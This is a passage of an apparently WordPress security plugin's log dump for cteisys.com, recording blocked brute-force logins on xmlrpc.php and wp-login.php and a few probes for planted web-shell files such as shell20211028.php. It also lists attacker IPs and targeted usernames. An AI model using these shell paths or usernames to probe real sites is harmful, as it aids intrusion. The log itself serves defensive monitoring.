,1664286263.2957,152,'dOfYcBjom6KuEpX4LPx529aZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('101.37.28.132',1696930948,'newd',0,1664286269.0509,152,'iIXgKlDTaQ6xYcmsWb7RnEoV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.101.71.221',342181853,'admin',0,1664286527.6907,51,'RL5uVGfHrOTnkKBAU12WXFhI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.183.122.143',3115809423,'newd',0,1664286697.3264,152,'vEiaSrCyNTWtkqgG9zfQBPdD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.49.20.77',3107001421,'newd',0,1664286707.6596,152,'6Lt0hJbDYvopf5xTMcV7ZkH3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('13.126.36.87',226370647,'newd',0,1664287126.5654,152,'tF2YoANEpO1wHykQCuSUz98d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.145.68.131',3197191299,'newd',0,1664287127.9231,152,'PgKjX4ByhiQCWn7OIprxU2YS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664288206.4432,152,'vE3XzILemF9jNu07PS62Hw5D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.123.60.24',3111861272,'newd',0,1664288206.5078,152,'GfnjU7wEH3QoJmDlgbhNtxBr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.32.113.107',757100907,'newd',0,1664288209.6956,152,'ZgHO8JIUE7MbcVvtLpaWRXNF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.2.114',2994733682,'newd',0,1664288216.2189,152,'WhHvnNK3GSs5DmLwiqCJlZru','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664288222.4221,152,'6mAhVa2zekWGxnjOICUsoXRt','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664288224.8843,152,'aSVWJQp9kCmqc30L7grevz1b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664288236.5227,152,'a54mVWGpjDqXQzTriln6JZNO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.109.209.136',1735250312,'newd',0,1664288244.2515,152,'Xqei8gdZKQsRvI4EwNl7fH2x','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664288248.4320,152,'fpkwjDigOyICWKVQsT8HoBS1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.57.9',3515693321,'nathaniel-lipka',0,1664288352.3966,51,'9pgsiWa1l6qCUvNYdBFSI5VT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('175.178.125.173',2947710381,'admin',0,1664288456.4441,51,'GivwnhTUYRMpeuAkQmBVgx69','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664289192.9133,152,'QCsDfKhtLcYVe5jHF1k2ilTA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.19.125.142',1024687502,'newd',0,1664289193.0005,152,'wmP50GAbOs2ghvNT4EpXLxSC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.97.218.49',627169841,'newd',0,1664289193.0925,152,'ZRmGjqCdf7QFYEOSvVIW8D19','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.54.204',2160539340,'newd',0,1664289198.4958,152,'niIPR6pqyfN8kFmSMvEZdg1D','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.94.61.21',392051989,'newd',0,1664289201.2888,152,'HcFvsKnNL4WUxGSm9tgyu625','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.163.161.146',1738776978,'newd',0,1664289201.2971,152,'AHBgdpJ9qIDKNUlaZL1MCQwR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664289208.2597,152,'I90Ol68RgBtjmZKndb4hPAxr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664289215.3736,152,'kSiEva2C10zyxt4fYVc8o3Aq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664289216.7679,152,'58afbL9Xy4JYRniGTCUsmjIx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('200.9.65.1',3356049665,'newd',0,1664289224.0722,152,'p7e4mKQubvsgJ1WnSx9tHrZd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.242.103',795603559,'admin',0,1664289602.7909,51,'6qVkCzasPi2EJGToMrv8DmXL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.21.38.119',3390383735,'admin',0,1664290751.4709,51,'yKWpdZlVugRnHMthLJ34x2Pq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('23.97.205.210',392285650,'admin',0,1664291892.2826,51,'WdBNGvFTgLjrROKVo5aSiC7n','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.159.155.6',866097926,'admin',0,1664291901.2509,51,'jCOGWo9vRP5D6JfUZaL7i4KA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664292714.2976,152,'893vLGDQxTd5oSPcXRhyVAOM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.94.61.21',392051989,'newd',0,1664292714.2979,152,'tfp4j7KakI5Gh2zEALFgRQsY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('164.46.54.101',2754492005,'newd',0,1664292718.3263,152,'Mb1U5aKorWdmHZ6CXcwGjRkv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664292719.6563,152,'sQkyLMUjFeOSDap013tCi5cb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.93.165.224',3109922272,'newd',0,1664292726.7984,152,'guTLYmzNy3DfI1WOdGQh720H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664292730.2279,152,'TCIlBAqRrDidVsYMgN9G2utU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664292730.6002,152,'KqSDcXI2oTmC8vYBzOx1n5G9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664292740.6679,152,'WHbnYO8S1jlLEz3VAspBox50','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.210.84.161',3000128673,'newd',0,1664292744.7847,152,'ZhepTER67qaWiob8CUH5uwFx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.71.32.81',1078403153,'newd',0,1664292750.5265,152,'pj9lwG8RWkEFVHNC273ItQYa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('37.251.155.62',637246270,'newd',0,1664292752.0637,152,'8dmo41AShiPXTGFkVeQvBI62','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.183.25',1088665369,'admin',0,1664293048.9960,51,'v79gjWG2Her1uIi5PVwLKlTf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('34.76.63.113',575422321,'admin',0,1664293068.1710,51,'cVTCnf0SyulAoDBZ6qPeh4WN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.75.15.189',860557245,'admin',0,1664294199.0694,51,'TO5Lx0IWdP6G1CJMZ7rinzSk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.56.99.136',2453169032,'admin',0,1664294213.0046,51,'Mtfhiua1dHJoNm4P2n9OYz6T','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('77.68.64.29',1296318493,'newd',0,1664294720.8869,152,'2w5SHtsxgbqf9cFjBk8X67DO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.190.34',1088667170,'newd',0,1664294720.8875,152,'oL28qXiZMSpPAYOynhftk7m4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.102.88.47',3110492207,'newd',0,1664294720.8889,152,'FxnAo3h2CH9TIPVqkO0Zd167','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664294727.4740,152,'0B1piIGgxqk2JuHjNctlorew','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664294729.1052,152,'SJZy4mKq7PY0jDzgXhQH9odr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.16',1386567184,'newd',0,1664294751.8517,152,'wHynEzrKMl6F9SJhOYtDX7xQ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('60.205.227.183',1020126135,'newd',0,1664294753.9299,152,'QWxoPMK6dUeyamzYjsItV3F9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.202.117.198',1959425478,'newd',0,1664294756.7458,152,'dXofpDIEG8vR5LkBKz46ciYH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.144.53',3265499189,'newd',0,1664294772.8243,152,'5OfeF7CtYzNhx2UQguj0Wva6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.59.150.45',2335938093,'admin',0,1664295333.9236,51,'buIh2n4SA1O9vpkHjWZEds38','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'admin',0,1664295339.3087,51,'Aal5x6SOsmoJzPuhbXqwKfjE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('54.37.156.240',908434672,'newd',0,1664296467.5927,7,'P6nmcfzbXoILgeKF0OYHEau4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.115.24.165',796072101,'newd',0,1664296472.4293,7,'46pRV5IlGgfD8YuMSXczv1Or','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('82.165.86.16',1386567184,'newd',0,1664297080.1600,152,'XvqR0zciMkpmsBNVoEbdfTuw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664297080.2919,152,'hrnFR5AZTqpoywB9bJ3Uz4cP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664297083.1368,152,'VYTAIJescXEB2rhCURbZNdp8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.109.209.136',1735250312,'newd',0,1664297086.0408,152,'1DsoxyAiJk08ewcEOdrK5lQq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664297095.2160,152,'9H5eC4i7sFvSMGhq6cOLJRkw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.156.2',908434434,'newd',0,1664297097.4729,152,'WqGbAJ5v0QzOjkZcI14BrtR3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664297099.3984,152,'RvLwz1AXBDSydYcjHxet7IW8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.40',1386567208,'newd',0,1664297111.7899,152,'VBFflQcEuriUjmw5s0qWyzoY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.99.125.19',2338553107,'newd',0,1664297118.9467,152,'JGcwmNlBEerb9jDsztnVZiOx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.79.120.96',760182880,'newd',0,1664297122.2696,152,'i2PgQ4Jkfx0npSMNXZhvw1qe','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.149.154.8',1737857544,'newd',0,1664297588.0947,7,'Qej68O0k4YthAb1RzfC3oUsJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1664297593.0714,7,'onDPvjfycMIVEGXOde9LCqwb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.225.235',3165053419,'newd',0,1664298693.7384,7,'5pZdLcUlQDnFE9mGk1BvJbiR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.96.74.105',794839657,'newd',0,1664298703.5441,7,'D6IXMCaR9W3mvOlHd0tST8yp','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.68.11.199',860097479,'newd',0,1664299189.5564,152,'GwfscZN3xrTPO549JDgiMhbC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.190.34',1088667170,'newd',0,1664299189.6844,152,'KbjRN20tozAs89MByYmdSeFi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664299190.9458,152,'cJCApT1KLkIu8nX5UgsvOa2t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.106.229',2155834085,'newd',0,1664299196.5225,152,'nUBvRpXh5cZuQj2Jfik6A9VG','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.152.172',868456620,'newd',0,1664299209.1413,152,'PYJFvVInhB143qH6ft80i5kK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664299212.0876,152,'4dYHDG78NUSInTbAmshFMvPJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664299219.0710,152,'Nzi4Xwlc1jh0dxn3OLHkVDSm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.203.120.246',2680912118,'newd',0,1664299783.5049,7,'XShre29boclyz870NZDnstEq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.54.127',3496818303,'newd',0,1664300859.6206,7,'qHNvWGTQxebD2gX7hoE6npZf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.192.91',858177627,'newd',0,1664300860.2223,7,'PYwTa5j94f6uBImcKUqgSnZW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('220.85.221.65',3696614721,'newd',0,1664301399.3208,152,'TzkNL1JVXhYIp0DobHv9KxtR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664301399.3424,152,'CA5OpGrzZ8BndY9muW4ePafb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('165.140.71.65',2777433921,'newd',0,1664301402.4332,152,'Tu5nrZecLVJHI4joRBOtEl3k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.41',3110826281,'newd',0,1664301408.7968,152,'X4WepS9loyRTzK3vnYtU2JkO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.77.159.184',860725176,'newd',0,1664301409.4660,152,'gzRsdL3nOfEPVC98HrmJahpW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('109.235.66.248',1844134648,'newd',0,1664301418.3587,152,'sxjhvaG2lKpXcwUISBNmf14o','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.18.17',1255150097,'newd',0,1664301423.3812,152,'NaGCJWLhMyZDuvdrRwVnT2e3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664301428.3097,152,'5kyBivAwhG3XcSReMHoanrDf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664301428.5293,152,'jzSMUu0aEtPvZ8RkY7sBKIhy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.19.125.142',1024687502,'newd',0,1664301434.1562,152,'pdgYS7CQVs9crLEW4ohO0qjH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664301441.9940,152,'NiT54tzA1Jp8He9gGx7jEqoF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664301445.6173,152,'TkB6ytfL9KlH1PuJCZFOzasd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.79.139.135',1934592903,'newd',0,1664301933.0092,7,'kpW7RAFLwDyQ6jidKvczM0V3','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1664301939.0367,7,'FQHZhB9Snvrjq7slITJGNAx1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664302475.2047,152,'NYeQm86GWBtyfJ5sl9RoOKXU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664302475.2135,152,'aIufdTSJUjeLEVrp1yqG9oBN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664302481.5955,152,'z0jmNdiEDlCJx9TfbRGq8HM1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664302481.9246,152,'R2NJI0vSpYM3TLQ8mqZ4jdD6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664302482.7568,152,'jtDKvQCki6dOVP41GBRX3pbh','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('203.156.136.113',3416033393,'newd',0,1664302491.9604,152,'bwRjhFGOK3t4Jx7sEQYvfiIy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664302496.2275,152,'0PG6U3OlEQegmvYbjDftCJMo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.88.207',1386567887,'newd',0,1664302505.1944,152,'g7MA8JSUIDslLzVv3mcXKhWB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.93.165.224',3109922272,'newd',0,1664302505.5281,152,'UxgoAnsdCvliBeROIZfzHY8t','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('69.163.196.200',1168360648,'admin',0,1664303026.3070,51,'4sQljhqJMGTPDRoXNEIYKk2n','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'admin',0,1664304102.9858,51,'mUyPBMi90rhzSGdZOva2KblF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'admin',0,1664304126.3231,51,'69V4cEsj8AKZDkyxPvGbJSoW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.42.179.67',1076540227,'joyce',0,1664305018.7654,152,'KObWfsdDH2n4VzU751IrgYAk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.65.234.0',574745088,'admin',0,1664305223.2713,51,'Wsk8R9vagXdxDHIlhrKVEBJo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.42.179.67',1076540227,'joyce',0,1664305396.0842,152,'Vjw7LlvKsX6MUyN0BSZbFhud','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664305782.8341,152,'FePaUBlDjTKdEJnuCRHWA6O5','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664305782.8360,152,'DWvBxTd53qgS1hGpkn0Ma9N4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.72.61.12',2487762188,'newd',0,1664305794.5949,152,'l7HBtRkv0SZE2J9sGC6efbxK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.116.205.56',3648310584,'newd',0,1664305795.1026,152,'CMGghkZz8XB1HRa3YNUqo5jd','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664305805.5839,152,'Fnktpred9yumjAzPIU0YZgs2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664305806.5193,152,'TjmW9qsb8Fw0vN1i2eUxEokK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664305809.9183,152,'jrBHG1tkJSh0eVDYvw6u8qTO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664305812.1571,152,'MmZpUr7SK6xCtPEhBDcaWI0i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('160.16.210.199',2685457095,'newd',0,1664305815.2284,152,'cib3lPSLg6CkJWDQmR9yTsGI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('57.128.45.42',964701482,'',0,1664305960.7619,55,'8evswNTGfIlW0krS7mbzZcnH','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('57.128.45.42',964701482,'',0,1664305967.0806,55,'WC7Q53ziF6PhVxpl2ymEftJG','','19|0|0|0|cteisys.com/wp-content/themes/seotheme/mar.php',0,19,0),('57.128.45.42',964701482,'',0,1664305985.1328,55,'C392DEi1AGzobXHwTYMncaZv','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('57.128.45.42',964701482,'',0,1664305992.9171,55,'1QsPr5NJSwTD64l9fgviRYGI','','19|0|0|0|cteisys.com/wp-includes/shell20211028.php',0,19,0),('69.163.196.200',1168360648,'admin',0,1664306319.6274,51,'n8j9D7LTJZmUKRQWaBkz4Ffc','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.113.171.103',3497110375,'admin',0,1664306326.9194,51,'qpbNBECnS19Wl0etGLQmr5fk','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'admin',0,1664307433.1519,51,'Rm3fpDyru1JEqChiScI7w50H','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('141.94.247.170',2371811242,'admin',0,1664307439.8310,51,'IgXtVvWYsoUlaFN9nGZ5DhdT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664307888.3625,152,'gRSja5sZxy2JA6OqUfLi0dHz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('87.117.247.34',1467348770,'newd',0,1664307888.3658,152,'Udrmq0PvNaF8K1VfSgtsZA75','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.81.85.56',1733383480,'newd',0,1664307888.5074,152,'7wqrYfgRpByVF9Lvi035nPHz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664307894.0645,152,'pwDOfBjX8qgEFeIUCVdxvt6H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.152.172',868456620,'newd',0,1664307915.3597,152,'e7XTnzEAyItQWqBmbaC0FrKP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.210.196.253',2513618173,'newd',0,1664307924.8549,152,'JPyM4ArzsQb2gSo0VGmwf95C','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664307929.5526,152,'1nfrusiQ6SMP2ClcvAW8DEBY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664307932.1534,152,'RTIGSipf2yecbuvjJPYHkL3U','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('198.244.167.101',3337922405,'admin',0,1664308532.2179,51,'wnyR72s5QECZmOTgF9KJdMtS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('64.90.36.102',1079649382,'admin',0,1664308555.9666,51,'KYwDS2bZy8J3Up1HLd7lTkfm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664308931.5969,152,'dgGW79uJna3EvAD2t0b8HSep','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('168.138.1.42',2827616554,'newd',0,1664308931.8220,152,'gs6LirnUPN7oFCQpWuymBS1M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664308950.2959,152,'iPulysXkN5bE7FxQnW0g96BA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664308954.4577,152,'29O3ghumGnWZBMvU1Yt5F4Ri','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664308958.1348,152,'4rpRmGu2lWntMvx1EAfSgK6L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.195.152.172',868456620,'newd',0,1664308961.2944,152,'fw7SKRHM9PyaYtdE4uv0lOkz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664308973.7563,152,'ThrEmQo0gMUYSDeHpi4kcx7d','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.78.15.126',2018381694,'admin',0,1664309663.5532,51,'Olmntsi9kuRr4DEgxLTSIKGa','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.170',3583549866,'joyce',0,1664309680.1325,152,'mwUNe0Ib6pKDY7vPLfaOCHxj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.107.242.103',795603559,'admin',0,1664310809.9016,51,'KuZJWQC50yVkzfFh42d3x6Sn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.201.0',2388510976,'admin',0,1664310824.9991,51,'ldc3Fwy5MRjnx6XkWtTviu1L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.89.109.117',2673438069,'admin',0,1664311926.8423,51,'L3vYSnma0Au6VzCqWKfIPeUO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('121.243.95.160',2045992864,'admin',0,1664311947.8844,51,'Ws0hYjCfvpBAeESkx9FniRMK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.68.47.69',3158585157,'newd',0,1664312559.7250,152,'olTAHXJ0FfiDd7nB5VtLukpZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664312559.8003,152,'uqoMB3A4SepKmi1hfC695JgP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.190.34',1088667170,'newd',0,1664312560.5135,152,'SyevufVnp81TxgIrdPLjJC07','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664312564.2827,152,'ZcAtdET9VWbMQmGYfIgzpL2r','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664312568.4491,152,'IPlX5u0ejzphDZkcC7UvEf9F','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.234.195.123',1542112123,'newd',0,1664312572.8362,152,'6tePXzK3cbypwhQnTYumVAro','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664312573.7670,152,'60OCuFyrsTe1EcPUKQjLxo7k','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.190.34',1088667170,'newd',0,1664312584.8322,152,'Jrgn84Z0Xl1HNo9AiBCSzuIc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664312608.0740,152,'5E4gx3QVNnYbczlsfD6LGCRP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1664313092.1768,7,'KNS3Z6ABVjQLuiCmp4Ysxlte','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('124.106.71.219',2087339995,'newd',0,1664314222.5193,7,'kMjIPuwLScAUntR9hJ2iaGKN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.114.72.18',796018706,'newd',0,1664314240.8418,7,'9hzYUcFZ0kN4mj5CReWtPMpI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.107.112.170',3110826154,'newd',0,1664314682.3265,152,'dGglSsyjrUJmtP3LwcRhDY2b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.204.239.12',1556934412,'newd',0,1664314692.3996,152,'WLtB3QE9O2UZp8mHbd4zawPy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664314698.1055,152,'wfs6BI0tTiMFalm4NS3LRrVv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664314706.1878,152,'4NZ0BVSlsWFuokndM2zThEe1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664314708.1392,152,'QLuvVSgfHmTnKaXroROwb0B2','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.36.53',2388468789,'newd',0,1664314710.5982,152,'AeLMI3zqSVCr6hd1JiX4TuRW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664314716.3261,152,'oNHCZn0aGb5WSFRp7DsdVmAJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.147.151',2160563095,'newd',0,1664314725.4594,152,'NIOKcFCqkihb2ofyVJ6ZYQ7G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.248.39',3483039783,'newd',0,1664315349.4186,7,'u0RUJ8SvXNDcesi29tfkpZby','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1664315372.5524,7,'eEzvaqAbxTRQrsM9IW1j524F','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.252.248.52',771553332,'newd',0,1664315406.9872,152,'6VRvsuMxAHz0kYUmXbG98geZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.227.159.220',1138991068,